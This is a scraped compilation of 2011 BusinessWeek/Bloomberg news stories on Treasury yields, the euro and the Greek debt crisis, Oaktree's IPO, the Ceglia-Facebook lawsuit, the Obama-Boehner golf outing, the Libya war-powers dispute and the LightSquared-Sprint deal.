10 straight weeks was in February to April 1986.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Volatility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Volatility of U.S. debt is the highest in two months, according to Bank of America Merrill Lynch's Move index. The gauge, measuring price swings based on over-the-counter options maturing in two to 30 years, rose to 87.90 on June 16, the most since April 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know how it's going to play out, and neither does the market," said Thomas Roth, senior Treasury trader in New York at Mitsubishi UFJ Securities USA Inc. "That's why we're volatile, jumpy."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10-year notes slid three basis points to 2.94 percent this week after touching 2.88 percent on June 16, the lowest level since Dec. 1. They dropped 17 basis points in the two days ended June 16, the most since the period ended March 16. The yields increased 11 basis points on June 14 in the biggest advance since Jan. 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Bonds fluctuated yesterday as Germany's Chancellor Angela Merkel signaled a willingness to compromise with the European Central Bank to avoid a default by Greece and a report showed U.S. leading indicators rose more than forecast.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Merkel's Stance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told reporters in Berlin at a press conference with French President Nicolas Sarkozy that "we would like to have a participation of private creditors on a voluntary basis," regarding aid for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comments indicated reconciliation between Germany's insistence that investors help bail out Greece with ECB warnings backed by France that any compulsory move risked a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Attention now shifts to Athens, where Papandreou overhauled the Cabinet to secure passage of austerity measures needed for a European Union and International Monetary Fund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Italy's credit ratings may be reduced by Moody's Investors Service because of economic growth challenges, risks associated with efforts to reduce debt and the potential for higher borrowing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Aa2 local and foreign currency government bond ratings were placed under review for a possible downgrade, Moody's said in a statement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Treasuries have rallied this quarter, pushing 10-year note yields down 50 basis points, on economic reports showing a slowdown in global growth as well as concern Europe is struggling to contain its debt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Regional Manufacturing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figures showed regional manufacturing shrank this month. The Philadelphia Fed's general economic index dropped to negative 7.7, from 3.9 a month earlier. The New York Fed's Empire State Index fell to minus 7.8 from 11.9. Economists forecast readings greater than zero, indicating expansion.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reduced bets on an increase in the Fed's target rate for overnight lending. Futures indicating the likelihood of higher borrowing costs by March 2012 dropped to 22 percent yesterday from 32 percent a month ago. The fed funds target has been held at zero to 0.25 percent since December 2008. Policy makers meet June 21-22.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 purchased $19.308 billion of Treasuries this week as part of its $600 billion second round of quantitative easing. The program to support the economy expires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Bond fell briefly yesterday as the Conference Board's leading indicators advanced 0.8 percent in May after a 0.4 percent drop in the previous month. The median forecast of 51 economists in a Bloomberg News survey was for a 0.3 percent increase in the gauge of the U.S. outlook for the next three to six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leading indicators seem to be one of the first positive economic data that we've had in a while," said Jason Rogan, director of U.S. government trading in New York at Guggenheim Partners LLC, a brokerage for institutional investors. "The market has priced in uncertainty in Europe and poor economic data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Dennis Fitzgerald, Greg Storey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Susanne Walker in New York at swalker33@bloomberg.net; Daniel Kruger in New York at dkruger1@bloomberg.net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Dave Liedtka at dliedtka@bloomberg.net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 Sales U.S. Healthcare System U.S.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Competitiveness U.S. Automakers U.S. Retail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http://www.businessweek.com/news/2011-06-18/u-s-two-year-notes-rise-for-10th-week-longest-gain-in-25-years.html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Euro Strengthens as Germany Signals Compromise on Greek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12:26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Strengthens After Merkel Agrees to Greek Debt Compromise Greek Bonds Sink, CDS Jump to Record as Default Concern Mounts Euro Pares Drop Against Dollar as EU Works on Greece Debt Crisis Euro Falls to 3-Week Low on Concern Greek Crisis Is Worsening Greek Government Bonds Drop as Bailout Talks Stall; Bunds Rise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Catarina Saraiva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The euro rose from a record low versus the Swiss franc as German Chancellor Angela Merkel said yesterday she would work with the European Central Bank on a debt plan for Greece.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shared currency reversed its losses against the Swiss currency after Merkel retreated from demands that bondholders shoulder a "substantial" share of a Greek rescue, easing concern the region's sovereign debt problems will worsen. Currencies of commodity exporting countries dropped this week as raw material prices slumped by the most in six weeks. The dollar gained against the euro before a Federal Reserve policy meeting next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focus for the market is the situation transpiring in Europe and how much risk is in the system," said Camilla Sutton, head of currency strategy at Bank of Nova Scotia in Toronto. "We are moving very quickly from one side of the boat to the other in terms of euro and it's highlighting how much uncertainty there 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rose 0.4 percent to 1.2142 francs, from 1.2098 June 10, and reached a record 1.19466. It weakened 0.3 percent to $1.4306, from $1.4347 last week. The shared currency fell 0.6 percent to 114.52 yen, from 115.24.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dropped 0.3 percent to 80.05 yen, from 80.32, a fourth straight week loss.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Year-to-Date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17-nation currency has gained 2.5 percent this year against nine other developed-nation currencies, according to Bloomberg Correlation-Weighted Currency Indexes. The dollar has declined 4.8 percent while the yen has lost 3.4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 dollar short positions against the euro, yen, pound, Australian dollar, Canadian dollar and Swiss franc rose for a third week and reached 185,700 in the five days ended June 14, according to the Commodity Futures Trading Commission figures released yesterday and data compiled by Bloomberg.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Zealand's dollar and Sweden's krona fell the most against the dollar this week among the 16 most-traded currencies. The kiwi, as the South Pacific island nation's currency is known, lost 1.1 percent to 81.28 U.S. cents, from 82.14. The krona fell 1.4 percent to 6.4142 per dollar, from 6.3273.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Zealand's dollar weakened after earthquakes with magnitudes of 5.2 and 6.0 struck near Christchurch, according to the U.S. Geological Survey.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Thomson Reuters/Jefferies CRB Index of commodities fell 3.6 percent, the biggest drop since the week ended May 6. The MSCI World Index of equities dropped 0.6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plunged the most in almost six weeks against the dollar on June 15 after Greek Prime Minister George Papandreou's government lost political support. The currency recovered yesterday as Merkel and French President Nicolas Sarkozy reached an agreement on the Greek crisis at a meeting in Berlin.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Vienna Agenda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aim is involvement of the private sector on a voluntary basis, and for that the Vienna Initiative, as it's called, is a good basis," Merkel said. "I think we can achieve something on this basis."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Adopting the Vienna plan, used during the financial crisis of 2009 for eastern European units of banks to maintain their exposure, would involve encouraging creditors to roll over expiring bonds, buying time for Greece until its austerity program shows results or until a permanent rescue fund kicks in from mid-2013. A rollover involves reinvesting the proceeds from maturing bonds in new securities.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Sarkozy and Merkel are indicating that there is progress in Europe, then you know that there is progress and that's what the market wanted to see," said David Watt, senior currency strategist at Royal Bank of Canada's RBC Capital unit in Toronto.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Watch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Italy's Aa2 local and foreign currency government bond ratings may be cut by Moody's, the company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focus squarely on the euro zone, Italy being placed on review by Moody's does highlight the idea that there are a number of issues affecting Europe," said Omer Esiner, chief market analyst in Washington at Commonwealth Foreign Exchange Inc., a currency brokerage. "There are a number of headwinds to Europe's recovery and even some of the core euro- zone economies are facing serious challenges, including Italy."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Index, which measures the greenback against the currencies of its six major trade partners, rose even as U.S. economic reports showed a slowing recovery. The index advanced 0.3 percent to 75.983 from 74.795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 Bank of New York's general economic index dropped to minus 7.8, the lowest level since November, from 11.9 in May. The median forecast in a Bloomberg News survey of economists was 12. The Fed Bank of Philadelphia's general economic index fell to minus 7.7, the lowest since July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Fed's policy-making Federal Open Market Committee will meet June 21-22.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 Bank of Richmond President Jeffrey Lacker said recent U.S. economic data have prompted him to reconsider his forecast for growth.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 are "causing us to rethink our outlook for growth," Lacker said to reporters after a speech June 13 in Roanoke, Virginia. "We could be stuck below trend for some time,"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Conference Board's gauge of the outlook for the next three to six months rose 0.8 percent after a revised 0.4 percent decline in April, the New York-based group said yesterday. Economists forecast a 0.3 percent gain, according to the median estimate in a Bloomberg News survey.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Two-year U.S. Treasury note yields fell for a 10th straight week, the longest slump in 25 years. They ended the week at 0.38 percent, from 0.4 onJune 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"Dollar-yen is going to struggle to move higher without U.S. yields moving higher," said Derek Halpenny, London-based European head of currency research at Bank of Tokyo-Mitsubishi UFJ. "We've had disappointing data from the U.S., so that's helped contain the two-year yield."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Allison Bennett in New York. Editors: Paul Cox, Greg Storey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Catarina Saraiva in New York at asaraiva5@bloomberg.net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Dave Liedtka at dliedtka@bloomberg.net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 Opportunities in Crisis Mortgage Crisis European Financial Crisis Foreclosure Crisis Germany's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http://www.businessweek.com/news/2011-06-18/euro-strengthens-as-germany-signals-compromise-on-greek-crisis.html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Marks's Oaktree Files for IPO to Join U.S.-Listed Buyout Rivals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RBC Said to Near Sale of U.S. Bank Unit to PNC Financial RBC Ranks First in Investor Satisfaction, J.D. Power Says Pandora Falls Below IPO Price, Reversing YesterdayБ─(tm)s Gain Carlyle Group Said to Interview Banks in Preparation for IPO Blackstone Turns Graham IPO Flop Into Lucrative Bids: Real M&amp;A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Gillian Wee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Oaktree Capital Management LP, the world's largest distressed-debt investor, filed to sell shares in an initial public offering, following private-equity rival Apollo Global Management LLC which went public in March.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which hasn't set a price range or the number of shares it will sell, registered for an IPO of $100 million. That is probably a placeholder to calculate filing fees, and the final amount may vary. Proceeds from the sale by Howard Marks's firm will be used to buy interests from principals, employees and investors, Los Angeles-based Oaktree said yesterday in a filing with the U.S. Securities and Exchange Commission.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Oaktree, which managed more than $80 billion as of March 31, according to the filing, is pursuing an offering after mixed results from leveraged- buyout firms Blackstone Group LP, Apollo and KKR &amp; Co. since going public. Oaktree raised about $1 billion in May 2007 when it sold a 15 percent stake on the private exchange run by Goldman Sachs Group Inc., a transaction valuing the company at $6.3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Oaktree was started in 1995 by Chairman Marks and six partners from Los Angeles-based investment firm TCW Group Inc. Marks, 65, a billionaire who owns about one-sixth of Oaktree, named the firm for the English translation of his Santa Barbara, California, weekend home, Las Encinitas.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firm's 17 distressed-debt funds averaged annual gains of 19 percent after fees for the past 22 years, about 7 percentage points better than its peers tracked by Boston-based consulting firm Cambridge Associates LLC.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Blackstone, Apollo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Blackstone, the world's largest private-equity firm, garnered $4.1 billion in its 2007 IPO, a year before the failures of Bear Stearns Cos. and Lehman Brothers Holdings Inc. jolted financial markets. The shares have fallen 46 percent below their IPO price, even after gaining 18 percent year-to- date. Apollo has declined 16 percent from its March 29 offering that generated $565 million. KKR, which gained a U.S. listing in July 2010, has risen 48 percent in New York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three competitors are based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Opportunities for making money in distressed investing dwindled in the past few years as the economy improved.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times when it is important to invest cautiously, and there are times when it's important to invest aggressively," Marks said in an interview before the filing. "A big part of the job is knowing where we are and choosing between those two. We believe that compared to one year, two years, maybe three years ago, this is the time to invest cautiously."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Returning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and April, Marks returned a total of $4.4 billion to investors in his $11 billion OCM Opportunities Fund VIIB, the largest distressed-debt pool in history. Oaktree had invested about $6 billion in the most senior debt of failing companies during the 15 weeks following Lehman Brothers' bankruptcy in September 2008, generating a gross annual return of 31 percent for the fund since its inception.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40 percent of Oaktree's assets are in distressed debt, 25 percent are in corporate bonds and 18 percent are devoted to so-called control investing, under which Oaktree takes ownership of firms by buying their debt or equity. Oaktree runs 16 strategies and has invested in troubled media company Tribune Co., movie-theater chain Regal Entertainment Group and CIT Group Inc., the small-business lender that came out of bankruptcy in December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Thirty-nine percent of the money Oaktree oversees comes from public pools led by pensions and sovereign-wealth funds, and 29 percent is from corporations. The firm's other clients include endowments, foundations, insurance companies, wealthy individuals and mutual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Goldman Sachs and Morgan Stanley are listed as the IPO underwriters. The shares will trade on the New York Stock Exchange under the ticker symbol OAK.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Josh Friedman, Christian Baumgaertel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Gillian Wee in New York at gwee3@bloomberg.net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Christian Baumgaertel at cbaumgaertel@bloomberg.net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Automakers U.S. Competitiveness U.S. Retail Sales U.S. Energy Policy U.S. Auto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http://www.businessweek.com/news/2011-06-18/marks-s-oaktree-files-for-ipo-to-join-u-s-listed-buyout-rivals.html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Facebook Plaintiff Passed Lie-Detector Test, His Lawyers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Jiau Jury Starts Weighing Charges of Hedge Fund Insider-Trading Oracle Seeks Б─≤BillionsБ─(tm) From Google in Java Patent Lawsuit MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Credit Suisse, Deutsche Bank, Goldman, UBS in Court News Apple Sued by New York Publisher Over Use of Б─≤iBooksБ─(tm)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Bob Van Voris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Paul Ceglia, who says that a 2003 contract entitles him to half the Facebook Inc. holdings of the company's co-founder and chief executive officer, Mark Zuckerberg, showed no deception on a polygraph test about his claim last week, his lawyers said in a court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June 11 test was disclosed in papers filed yesterday by Ceglia's lawyers opposing Facebook's request that it be allowed to immediately inspect the original of the alleged contract and the e-mails Ceglia claims he exchanged with Zuckerberg in 2003 and 2004, before being required to turn over any evidence to Ceglia.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respectfully suggest that Mark Zuckerberg undergo the same polygraph examination I have in order to expose who is really telling the truth," Ceglia, 37, said in a sworn statement submitted yesterday to the federal court in Buffalo, New York, where his suit is pending.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yesterday's filing, Ceglia's lawyers asked the court to order both sides to turn over evidence to determine whether the contract is genuine, including all of Zuckerberg's documents, e- mails and instant messages relating to Facebook before July 30, 2004. Ceglia asked the court to order both sides into mediation.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 hasn't shown the original contract publicly or to representatives of Facebook. The two-page document is in a bank safe-deposit box in Hornell, New York, according to Ceglia's lawyers.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Stake in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 claims he is entitled to a multibillion-dollar stake in Facebook. The closely held company may be worth $69.3 billion, according to Sharespost.com, an online marketplace for investments in companies that aren't publicly traded. Palo Alto, California-based Facebook runs the world's biggest social- networking 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June 2 request, Facebook called Ceglia "a hustler" who has engaged in various swindles over the past several years. The company said Ceglia's claimed contract is "an amateurish forgery" and the e-mails fabricated. Facebook argued it needed to examine the documents immediately to put an end to a fraud on the court.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"Ceglia's lawsuit is a shell game, shifting and changing with every filing," Orin Snyder, a lawyer for Facebook and Zuckerberg, said in a statement responding to Ceglia's filing yesterday. "Ceglia does not dispute that he has a track record of forging documents to rip people off."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‘Terrible Toll'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Snyder said polygraphs are easily manipulated and routinely disregarded by courts.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case and the tactics of Mark and Facebook have taken and continue to take a terrible toll on me, my wife, our two sons, and even our parents," Ceglia said in his sworn statement filed yesterday. "I have been repeatedly called a liar in the press and in the papers filed by defendants in this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 sat for the polygraph test on June 11 in the Erie County, New York, office of Michael Pliszka, who administered the test, according to the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questions asked during the polygraph examination were designed to determine whether Mr. Ceglia had fraudulently forged or doctored the agreement," Pliszka said. "It is my opinion that the examination results are classified as ‘No Deception Indicated.'"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statement, Ceglia said he and Zuckerberg met in the lobby of a hotel in Boston on April 28, 2003, and signed the contract, which Ceglia prepared by cutting and pasting from two different forms.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Document Testing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Ceglia's lawyers proposed subjecting the original contract to testing, which would be conducted by a mutually agreed or court-appointed expert, to determine the age of the ink on the contract. The necessary tests would destroy part of the document,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Included in yesterday's filing are the opinions of two document experts and a computer expert.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Evans, a computer expert hired by Ceglia, said his firm took from him 169 floppy discs, 1,075 compact discs and two computer hard drives. One of the floppy discs has three Microsoft Word documents containing copies of e- mail correspondence between Ceglia and Zuckerberg. Ceglia said he copied the messages from his Internet-based msn.com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amended complaint filed in April, Ceglia quoted from e-mails he said he exchanged with Zuckerberg, which he said support his claim that the two men formed a partnership that gave Ceglia half-ownership of Facebook when it was started in 2004.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Zuckerberg said in a court filing that Ceglia hired him in 2003 to do Web- development services for StreetFax.com, a business Ceglia was trying to start at the time. Zuckerberg, then a student at Harvard University, signed a contract drafted by Ceglia, which referred only to the StreetFax work, he said. The contract made no mention of Facebook, which Zuckerberg started months later,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Ceglia v. Zuckerberg, 1:10-cv-00569, U.S. District Court, Western District of New York (Buffalo).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Fred Strasser, Glenn Holdcraft.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Bob Van Voris in U.S. District Court in Manhattan at rvanvoris@bloomberg.net.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Facebook Advertising Retirement Strategies Gates Foundation Corporate Legal Departments Obama's Healthcare Reform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http://www.businessweek.com/news/2011-06-18/facebook-plaintiff-passed-lie-detector-test-his-lawyers-say.html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Obama and Boehner Tee It Up to Negotiate Fairways Not Budget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Boehner Challenges Obama on Libya Rationale Amid Б─≤RobustБ─(tm) Debate Biden Says Deficit Talks Seek Signal With $4 Trillion in Savings Biden Focuses on Pensions, Agriculture in Debt-Cut Talks Boehner Says Lawmakers May Seek to Deny Libya Mission Funds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Talev</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Fights over the debt ceiling and the conflict in Libya can wait until next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weather permitting, President Barack Obama and House Speaker John Boehner will swap rhetoric for clubs and partisanship for par.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and Boehner, an Ohio Republican, will meet on an as yet undisclosed course in the Washington area for their debut golf outing together. The goal, according to aides, is to forge a closer relationship that might help down the road in negotiations, rather than leaving the links with a deal to cut federal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know that one golf match will do it but it's a good beginning," said Representative Jim Clyburn, a South Carolina Democrat who has played rounds with both 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Vice President Joe Biden and Ohio Governor John Kasich will round out the foursome.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day jobs, Obama wields more power than Boehner. On the course, Boehner has the clout. In its June issue, Golf Digest ranked Boehner the 43rd best golfer in Washington with a 7.9 handicap. That trumps Obama's estimated 17 handicap, putting him 108 on Golf Digest's list.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Kasich's spokesman, Rob Nichols, described the governor as within spitting distance of an 8 handicap.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Obama's not-so-secret weapon is Biden. Golf Digest puts his handicap at 6.3, making him 29th on the list of the capital's 150 best golfers.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Relaxed Style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Terry Holt, a Republican consultant and former Boehner aide, said on the course the House speaker is "very relaxed and easy-going." Holt said Boehner also loves the strategy of the game and enjoys sharing tips on how to make tough putts.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Clyburn described Obama as a moderate risk-taker on the course, focused if he lands in a sand trap yet relaxed enough to chat off-topic. During their game last summer at Martha's Vineyard, Clyburn said Obama "took the time to get to know more about me. He asked a lot of questions about my parents and growing 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Nichols said Kasich had no plans to talk about policy: "Nothing is more unnerving than to be squawking about debt ceilings during another guy's backswing,"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Budget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contentious budget talks will be prominent in the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 is the administration's point man in negotiations with Congress on cutting the deficit and raising the debt ceiling. He wrapped up three days of talks yesterday with a group of lawmakers who are trying to hash out a plan to shrink the government's long-term deficit by at least $4 trillion over about a decade. The aim is to reach a budget-reduction deal in time for Congress to meet an Aug. 2 deadline for raising the nation's $14.3 trillion debt limit.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 led the House Budget Committee when Republicans took control of the House in 1995 and was a linchpin in negotiations with Democratic President Bill Clinton on cutting spending and the deficit. He won Ohio's governorship last year by defeating a Democratic incumbent in a swing state that is key to Obama's 2012 re-election strategy.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issue of protocol hasn't been publicly resolved. Boehner, 61, smokes cigarettes. Obama, 49, gave up the habit under pressure from first lady Michelle Obama after he became president. Asked by reporters whether Obama would ask Boehner to refrain while on the course, White House Press Secretary Jay Carney said, "I'm sure that the president will be a fine host."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game largely will take place out of range of cameras and reporters. Carney said that while there will be an opportunity for a photograph, there are no plans to give a detailed report on what they discussed. He said he had "no idea" whether the score will be released.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Open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match isn't the only game in town drawing attention. It will play out in private, while top professionals play the penultimate day of the U.S. Open at Congressional Country Club in Bethesda, Maryland, about 12 miles northwest of the White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Trostel, curator and historian at the USGA Museum in Far Hills, New Jersey, the archive for the sport's ruling body in the U.S., said that since William Howard Taft in 1909 all but three of the men who've been president - Hoover, Truman and Carter - have played golf.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Political Pressure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Lyndon B. Johnson used golf to help round up support for the Civil Rights Act in 1964, Trostel said, "It seems like a lot of presidents play the game to get away from the pressures of the office."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other politicians, he said, "it seems like it's the exact opposite reasons, to push through legislation or garner some votes for a bill they're supporting."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Trostel said in the Depression era, the New Deal program of President Franklin D. Roosevelt, an avid golfer until he was struck by polio at age 39, led to the development of more than 300 of the nation's public courses.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match may give a boost to the sport, which has stagnated in recent years under pressure from demographic and economic trends.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golfers numbered 30 million in 2005 and 26.1 million last year, according to statistics released by the National Golf Foundation in Jupiter, Florida.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"Golf can use all the publicity it can get," said Stuart Lindsay, principal at Edgehill Golf Advisors in Mequon, Wisconsin.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Golf, a coalition of golf associations and industry members, yesterday released a statement highlighting the Obama- Boehner game's potential to improve "many critical challenges facing the nation" and saying that golf supports 2 million U.S.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 Nathan, senior vice president for the National Golf Foundation, also praised Obama and Boehner and said that "love for golf is a common ground that can be very effective at building bridges between people of different views."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Joe Sobczyk, Ann Hughey.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Margaret Talev in Washington at mtalev@bloomberg.net.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IT for Oil and Gas Obama's Stimulus Plan Obama's Economic Policy Obama's Healthcare Reform IT Security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http://www.businessweek.com/news/2011-06-18/obama-and-boehner-tee-it-up-to-negotiate-fairways-not-budget.html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Boehner Challenges Obama on Libya Rationale Amid ‘Robust' Debate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12:35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Obama and Boehner Tee It Up to Negotiate Fairways Not Budget Lugar Gives Obama Б─≤at BestБ─(tm) Mediocre Grade for Foreign Policy Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Boehner Says Lawmakers May Seek to Deny Libya Mission Funds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Talev and James Rowley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House Speaker John Boehner is accusing the White House of deciding to "conceal" a Justice Department opinion that contradicts President Barack Obama's argument that the U.S. mission in Libya doesn't need congressional authorization to continue.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Ohio Republican released a statement last night after Obama declined in a letter to Boehner to address the Justice Department's Office of Legal Counsel's views on whether the War Powers Resolution of 1973 applies to the mission. Obama takes the position it doesn't apply because the U.S. is serving a support role to the NATO-led mission that does not meet the definition of "hostilities" that requires congressional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 Press Secretary Jay Carney earlier said there had been internal debate among advisers to the president as to the interpretation of the statute. The New York Times reported late yesterday that Obama had overruled the views of Pentagon General Counsel Jeh Johnson and the acting head of the Justice Department's Office of Legal Counsel, Caroline Krass, that the resolution did apply. The Times reported that White House Counsel Bob Bauer, State Department legal adviser Harold Koh and others countered that it didn't apply and that Obama sided with the latter camp.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 "full airing of views within the administration and a robust process" that led Obama to his decision that the war powers law didn't apply, White House spokesman Eric Schultz said in an e-mailed response to questions. He declined to release the Justice Department's position or discuss individual attorneys' advice.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Intense Debate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Schultz said the resolution has been "subject to intense debate" since its enactment in 1973 that that "it should come as no surprise that there would be some disagreements" inside the administration as to how the law applied.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Justice Department spokesman Matthew Miller declined to confirm details of the OLC position. "Our views were heard, as were other views, and the president then made the decision as was appropriate for him to do," he said in an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mission in Libya is pitting Boehner and Obama from opposite sides of the argument over when the War Powers Resolution applies. Boehner once called the resolution "constitutionally suspect," and Obama, when he was a senator, argued that Congress must have the "backbone" to stand up to presidents when they want to send troops into battle.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Standoff Escalates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standoff has escalated since the administration produced its 32-page report on June 15 laying out the president's rationale for committing U.S. forces to an air campaign with NATO allies against Muammar Qaddafi's troops without congressional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has said the House will look at options to force Obama's hand, including cutting off funding for the operation or blocking unrelated White House priorities. Democratic Senator Richard Durbin of Illinois, a close ally of Obama, said Congress should go ahead and give its support for military operations against Qaddafi's regime.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right thing to do is for Congress to approve of the president's action, make it official," Durbin said. "Whether it's necessary, if it includes reference to it and makes it clear that we are acting consistent with the War Powers Act, that's what I'm looking for."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 Powers Resolution, passed in 1973 in reaction to U.S. involvement in Vietnam, has been at the center of struggles between presidents of both parties and Congress ever since.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Supporters and Critics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supporters of Obama and U.S. action against Qaddafi were critical of the administration's argument that the president doesn't need congressional authorization. In its report to Congress, the administration said the resolution doesn't apply to the Libya mission because the U.S. is primarily in a support role and isn't engaged in hostilities as defined in the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rejected the administration's reasoning, saying in his statement last night that "the White House's suggestion that there are no ‘hostilities' taking place in Libya defies rational thought. Now, its decision to conceal the opinion of the OLC raises even more concerns."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coming week, our members will review all options available to hold the administration to account," Boehner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White House report repeated that the administration would welcome a resolution that a bipartisan group of senators has drafted to "confirm that both branches are united in their commitment to supporting the aspirations of the Libyan people for political reform and self- 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‘Hard to Swallow'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John McCain, an Arizona Republican and one of the sponsors of the resolution, said he found Obama's legal argument "hard to swallow." Senator Richard Lugar of Indiana, the top Republican on the Senate Foreign Relations Committee, called Obama's stance "both legally dubious and unwise."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 Jim Clyburn, a South Carolina Democrat, said Boehner "has a legitimate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all about separation of powers," Clyburn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Boehner's objections are joined by antiwar Democrats such as Ohio Representative Dennis Kucinich, who with nine other lawmakers has filed a lawsuit challenging the president's authority to carry out the mission.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Kucinich said yesterday he'll move to end funds for continued U.S. military support for the Libya operation when the House takes up on the annual defense-appropriations measure next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‘Direct Challenge'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direct challenge to Congress, the administration is continuing the war despite its inability to provide a constitutional or legal justification for bypassing" lawmakers, Kucinich said in a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earlier Kucinich amendment to order an end to the U.S. role in the Libya mission in 15 days was defeated on June 3, though it drew support from 87 Republicans and 61 Democrats.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McCain warned his fellow Republicans against trying to block the mission, saying they need to ask themselves if they want to appear to take sides with Qaddafi against Obama.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administration may assert that we are not engaged in hostilities in Libya, but the Senate should go on record as authorizing these operations," he said in the text of a speech delivered on the Senate floor June 16.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49, ordered military action against Qaddafi's regime in March, saying he was acting to keep a "tyrant" from killing civilians protesting his rule. Since then the mission's lead has been transferred to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Reserves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conflict in Libya, which has Africa's largest proven oil reserves, followed uprisings elsewhere in North Africa and the Middle East that toppled leaders in Egypt and Tunisia.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Violence in the region has helped push up oil prices, and futures are up 22 percent from a year ago. Crude oil for July delivery dropped $1.94 to $93.01 a barrel.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a Democrat, and Boehner have argued opposite sides of the issue in the past.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61, in 1999 spoke against invoking the War Powers Resolution to constrain then-President Bill Clinton's decision to initiate a NATO air campaign in Kosovo. Boehner said it would tie the hands of future presidents in responding to crises.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Obama's remarks were made in a 2007 speech at DePaul University in Chicago. An opponent of the Iraq war, Obama said the War Powers Resolution was written to make sure Congress wouldn't be "duped" into a war.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Scholars such as Mark Rozell, a public policy professor and expert on presidential powers at George Mason University in Arlington, Virginia, said Obama may be on thin legal ground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Rozell described Obama's rationale in the White House report as "clever, legalistic language" that relies on "bad precedents" over the past four decades in which Congress ultimately didn't punish presidents for acting without their consent. "The president overreached his constitutional authority,"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Louis Fisher, who worked for four decades as a specialist on separation of powers and constitutional law with the Library of Congress, said Obama miscalculated.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it had been a week or two, it would be OK," but as the conflict stretches into months, "now it's not OK. I think he's been giving the back of his hand to Congress."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Laura Litvan and Roxana Tiron in Washington. Editors: Robin Meszoly,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Talev in Washington at mtalev@bloomberg.net; James Rowley in Washington at jarowley@bloomberg.net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Stimulus Plan Obama's Economic Policy Obama's Healthcare Reform Marketing Challenges Offshore Oil Drilling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http://www.businessweek.com/news/2011-06-18/boehner-challenges-obama-on-libya-rationale-amid-robust-debate.html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Falcone's LightSquared, Sprint Agree to 15-Year Network Accord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RBC Said to Near Sale of U.S. Bank Unit to PNC Financial AngieБ─(tm)s List Is Said to Pick BofA to Handle Planned August IPO Capital One Said to Near $9 Billion Deal for ING Direct USA Wells Fargo Lures Neglected Rich in New York Private-Bank Push Citigroup Hires Hoover for Capital Markets Origination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Greg Bensinger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Billionaire Philip Falcone's LightSquared Inc. reached a 15-year deal with Sprint Nextel Corp. to share network expansion costs and equipment, and to provide high-speed wireless service to the phone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Falcone told Harbinger Capital Partners hedge fund investors yesterday about the accord in a letter obtained by Bloomberg News. The companies were discussing a deal valued at as much as $20 billion, people familiar with the matter said earlier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and Sprint will jointly develop, deploy and operate LightSquared's 4G LTE network," according to the letter. "Sprint will become a significant customer of LightSquared's 4G LTE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is an important step forward for Falcone, whose effort to challenge Verizon Wireless and AT&amp;T Inc. was met with skepticism after plans for LightSquared emerged in government filings about 15 months ago. Falcone is gambling more than 60 percent of his hedge fund on LightSquared.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deal is a huge positive for Harbinger investors simply because it represents such a large proportion of his hedge fund," said Don Steinbrugge, managing partner of Agecroft Partners LLC, a Richmond, Virginia-based firm that advises hedge funds and investors. "It's a step in the right direction given all the uncertainty surrounding this investment."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Sprint's Challenge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Sprint, the deal would provide a new source of revenue as the third- largest U.S. wireless company struggles to compete with bigger rivals. AT&amp;T is trying to acquire Deutsche Telekom AG's T-Mobile USA unit, which would let it pass Verizon Wireless to become the country's No. 1 wireless operator. Sprint Chief Executive Officer Dan Hesse is fighting to block the deal, which needs government approval, arguing it would stifle competition.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 which has lost contract customers in 14 of the past 15 quarters, has pledged $5 billion to upgrade its network over the next three to five years. The company can use LightSquared's network to lessen the load on its own network as data demand has skyrocketed, an issue that has plagued other carriers.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Hesse said last month Sprint was in talks with Clearwire Corp. on a similar network deal. Kirkland, Washington-based Clearwire provides Sprint's fourth- generation wireless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Overland Park, Kansas-based Sprint fell 2 cents to $5.19 yesterday in New York Stock Exchange composite trading. The shares have gained 23 percent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GPS Questions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CEO Sanjiv Ahuja said in a June 10 televised interview with "Bloomberg West" that his company had held discussions with Sprint. Bill White, a Sprint spokesman, and Steve Bruce, a spokesman for New York-based Harbinger,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gets LightSquared to their goal of nationwide coverage much more quickly than if they were going to build it out on their own," Chris Larsen, a Piper Jaffray &amp; Co. analyst in New York,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Communications Commission has asked that LightSquared study whether its network interferes with global- positioning systems. The company has commissioned a study of the issue, due July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will have to resolve these issues with GPS before Sprint can make full use of that extra capacity," said Larsen, who rates Sprint "overweight."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Separately, LightSquared will announce as soon as next week it will begin soliciting bids to sell wireless service from its satellite to governments or other agencies to help supplement their earth-based emergency and first- responder networks, said a person familiar with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satellite service would serve as a backup for the terrestrial networks in the case of emergencies that knock out equipment on the ground, said the person, who declined to be identified because the plans aren't yet public. LightSquared launched the satellite in November.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Saijel Kishan in New York. Editor: Julie Alnwick, Peter Elstrom, Stephen West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Greg Bensinger in New York at gbensinger1@bloomberg.net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 Networking Events Network Infrastructure Ad Networks Network Neutrality Oprah Angel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http://www.businessweek.com/news/2011-06-18/falcone-s-lightsquared-sprint-agree-to-15-year-network-accord.html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Lugar Gives Obama ‘at Best' Mediocre Grade for Foreign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12:17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Boehner Challenges Obama on Libya Rationale Amid Б─≤RobustБ─(tm) Debate Obama and Boehner Tee It Up to Negotiate Fairways Not Budget Obama Said to Talk With CommerceБ─(tm)s Blank on Economist Job Weiner of New York Said to Plan to Resign From U.S. House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Dodge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Republican U.S. Senator Richard Lugar, a onetime supporter of Barack Obama's foreign policy, said the president's performance has slipped to "at best" mediocre.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efforts in Afghanistan do not really have the benefit of objectives and a very clear path," Lugar, the top Republican on the Foreign Relations Committee, said in an interview on Bloomberg Television's "Political Capital with Al Hunt," airing this weekend. "The Libya situation borders on being a fiasco altogether."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diplomacy with Pakistan "certainly leaves a lot to be desired," said Lugar. "In short, this is not a situation that is going particularly well." In addition, he said, "We have a NATO alliance that is becoming weaker as time goes on," referring to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give Obama a foreign policy grade of "at best a C." Lugar said two years ago the president deserved an "A" because the administration was more inclusive and reached out more to U.S. allies than did Republican President George W. Bush.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reiterated his criticism of the Obama administration for its refusal to seek congressional approval for U.S. involvement in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in conflict with some lawmakers over his commitment of U.S. forces to an air campaign with NATO allies against Muammar Qaddafi's troops. The administration argues that it doesn't need authorization from Congress, and Lugar has called that position "legally dubious and unwise."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‘Might Get Lucky'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suggested that the administration miscalculated in its decision to join the conflict, which is entering its fourth month with Qaddafi still in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guess is that the president or others felt they might get lucky, that if they did look as if NATO was coming in, Qaddafi would say, ‘It is time for me to go,'"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six-term Indiana lawmaker said if a resolution to support the U.S. action in Libya were brought up for a vote in the Senate, he 